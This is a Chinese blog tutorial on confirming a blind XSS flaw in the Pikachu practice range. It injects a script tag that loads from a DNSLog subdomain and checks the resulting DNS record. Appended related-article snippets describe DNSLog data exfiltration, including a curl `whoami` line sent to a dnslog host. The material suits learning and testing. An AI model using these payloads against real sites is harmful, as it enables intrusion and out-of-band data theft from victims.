DNSLog漏洞探测(三)之XSS漏洞实战

最新推荐文章于 2025-03-26 00:46:18 发布
最新推荐文章于 2025-03-26 00:46:18 发布
阅读量1.7k 收藏 3
点赞数 5
分类专栏: DNSLog漏洞探测 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/134943693
版权
本文介绍了如何利用DNSLog平台探测网站是否存在XSS漏洞,通过获取子域名并构造payload,验证XSS漏洞的存在。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DNSLog漏洞探测(三)之XSS漏洞实战

通过前面的学习,我们已经明白了什么是DNSLog平台,那么DNSLog平台到底能为我们做些什么呢?

DNSLog的平台实际使用很长见的一种情况就是针对漏洞无回显的情况,我们通过让受害者的服务器主动发起对DNSLog服务平台的请求去外带一些信息,但更多的使用场景是我们仅仅使用DNSLog去作为探测漏洞是否存在的一种手段。比如XSS(跨站脚本攻击)漏洞、RCE(远程代码执行)漏洞、XXE(XML外部实体注入)漏洞、SSRF(服务器请求伪造)漏洞等。假如目标网站没有存在漏洞,那么DNSLog平台是不会出现解析记录的。这种情况下,我们利用DNSLog平台仅仅是为了验证该漏洞是否存在。

如果我们需要用DNSLog平台去探测一个网站是否存在XSS漏洞,那么我们该怎么操作呢?

首先我们先打开DNSLog平台,点击 Get SubDomain 获取一个子域名

在这里插入图片描述

这里我们获取到的子域名是 p9coa4.dnslog.cn

这里我们使用Pikachu的靶场作为演示

在这里插入图片描述

接下来,由于这里文本框的长度是有限制的,所以我们先按下 F12,将文本框的长度参数修改为200

在这里插入图片描述

然后在文本框提交我们的payload,那么如何构造我们的payload呢?

#原始payload
<script src=http://xxxxxx.dnslog.cn></script>
#只需要将xxxxxx.dnslog.cn的内容替换为我们获取到的子域名
<script src=http://p9coa4.dnslog.cn></script>

我们只需要将xxxxxx.dnslog.cn的内容替换为我们获取到的子域名,并放入文本框点击提交就好了

在这里插入图片描述

点击提交后

在这里插入图片描述

现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在XSS漏洞

在这里插入图片描述

dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1989
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1064
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第方站点 A。
DNS与DNSLog
qq_45675619的博客
05-11 2414
这里写目录标题DNS简介解析过程DNSLog简介ceye的使用DNSLog注入SQL盲注 DNS 简介 DNS(Domain Name System),也就是域名系统。将域名与IP地址相互映射的一个分布式数据库。DNS使用UDP端口53。 域名解析的过程就是将域名去DNS服务器的数据库中寻找,这是比较耗费时间的。为了提高上网速度,运营商一般在他们的DNS服务器中缓存了许多的DNS记录,再根据用户所在地进行网络分配。这样用户打开网页则不需要去查询DNS数据库,而是直接使用缓存的DNS记录。 解析过程 大致流程
穿透式侦查:DNSLog在红队攻防中的降维打击
安全瞭望Sec
03-26 1195
DNSLog 是一种基于 DNS 协议的隐蔽通信技术,主要用于网络安全领域的漏洞探测与攻击验证
DNSlog漏洞探测
2301_80661529的博客
03-16 2395
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
XSS漏洞利用实验——使用两种方式外带用户数据
weixin_44656518的博客
10-15 896
使用自建服务器和DNSlog实现XSS数据外带
渗透测试中dns log的使用
zhangge3663的博客
05-08 1103
一、预备知识 dns(域名解析): 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。 域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说的简单点就是将好记的域名解析成IP,服务由DNS服务器完成,是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。 互联网中的地址是数
web漏洞-渗透测试-加密解密注入-二次注入-DNSlog带外注入-中转注入-附SQLi-LABS靶场操作示例
ran的博客
01-18 815
加解密注入就是比常规注入多了一步,需要对网站加密方式进行还原,在注入过程中,所有的注入语句要按照网站的加密方式进行加密后再进行注入。DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。sqlmap工具;BurpSuit抓包;SQLi-LABS靶场;
JavaWeb代码审计实战之迷你天猫商城系统详细分析版,实战应用级系统的Log4j2shell代码审计
Power7089的博客
08-22 2510
JavaWeb代码审计实战之迷你天猫商城系统详细分析版,实战应用级系统的Log4j2shell代码审计
ssrf漏洞挖掘
最新发布
04-01
- **功能**:自动化参数探测、支持多协议测试、可结合XSS和SQLi等漏洞[^1]。 - **使用示例**: ```bash ruby ssrfize.rb -u "http://target.com?url=PAYLOAD" --payloads urls.txt ``` 2. **Burp Suite** ...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6051
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9858
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
dnslog注入
weixin_33928137的博客
12-21 304
   使用Powershell反弹Meterpreter Shell cloudeye在windows下的应用 今天突发奇想的一个姿势,算不上什么技巧,分享一下吧。看到有人问过。http://zone.wooyun.org/content/27440其实很羡慕linxu的curl `whoami`.xxxxxx.dnslog.info这样去获取数据什么的。windows下...
DNSlog外带
adaosanqian的博客
02-28 7745
减轻盲注的复杂操作,运用DNSlog外带来进行操作
Web漏洞知识梳理笔记--DNSlog数据外带
qq_47742555的博客
12-24 1419
DNSlog 数据外带技术利用了服务器发出的 DNS 请求来确认漏洞的存在和执行结果。通过利用 DNSlog 服务,攻击者可以有效检测 SSRF、盲注、RCE 等漏洞,并可能外带一些敏感数据。为了防范此类攻击,需要对外部请求进行严格限制,并加强对服务器网络访问的监控与防护。dnslog.cn。
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 3074
创新蓝队-针对DNSlog数据外带攻击的应急与预防
XSS Trap—XSS DNS防护的简单尝试
weixin_33739523的博客
08-01 1059
安全客点评 思路挺新颖的,虽然这种防护有一定的局限性,比如攻击者用IP替代域名就绕过了,但是可以通过文中提及的XSS DNS防护方式了解到企业业务中有哪些WEB服务的XSS点正在被利用,方便排查,而且该防护措施部署上也不是很复杂。 前言 对于一个大的企业来说,要完全杜绝某一类型的漏洞是很难的,特别是 XSS 这种乍一看危害不大但是实际上影响面比较...
SQL注入漏洞之盲注原理 sql注入 DNSLOG注入回显 详解 XFF注入 靶场练习以及案例说明哟
浩策盾悟
01-24 9772
substr()函数 substring -- sub子集 string -- 字符串 子字符串 aabbcc -- aa bb aab aabbc pikachu 从第一个位置开始取出1个字符 ascii('p')SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注.我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。如果使用了布尔盲注没有错误返回,其实还有一个盲注类型是可以尝试的那就是时间类型盲注.
DNSlog注入 信息的 带外|外带 sql注入利用详解+实操
weixin_48083470的博客
08-04 5274
DNSlog注入 DNSlog注入原理 dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据 一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度 首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性 s
蚁群算法粒子群算法鲸鱼算法
08-20
蚁群算法、粒子群算法和鲸鱼算法都是集群智能优化算法中的一部分。 蚁群算法是一种模拟蚂蚁行为的算法,通过模拟蚂蚁在寻找食物时的信息交流和选择行动的方式来解决问题。蚁群算法在解决优化问题方面表现出色,可以应用于路线规划、图像分析等领域。 粒子群算法是一种模拟鸟群觅食行为的算法,通过模拟粒子在搜索空间中的位置和速度变化来寻找最优解。粒子群算法具有全局搜索和局部搜索能力,可以应用于连续优化、组合优化等问题的求解。 鲸鱼算法是一种模拟鲸鱼游动行为的算法,通过模拟鲸鱼在搜索食物时的策略来解决优化问题。鲸鱼算法具有高收敛速度和较强的全局搜索能力,可以应用于连续优化、离散优化等问题的求解。 这些算法都是通过模拟自然界中生物的行为来解决优化问题的,每种算法都有其独特的优点和适用范围。在实际应用中,选择合适的算法取决于问题的性质和求解的要求。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [粒子群、遗传、蚁群、模拟退火和鲸鱼算法优缺点比较](https://blog.csdn.net/qq_43641765/article/details/111414878)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [粒子群算法、遗传算法、差分进化算法、模拟退火算法、蚁群算法优缺点对比](https://blog.csdn.net/weixin_46390192/article/details/125116807)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Python算法:粒子群优化 (PSO)、萤火虫算法 (FA)、布谷鸟搜索 (CS)、蚁群优化 (ACO)、人工蜂群 (ABC)](https://download.csdn.net/download/qq_38334677/85548265)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值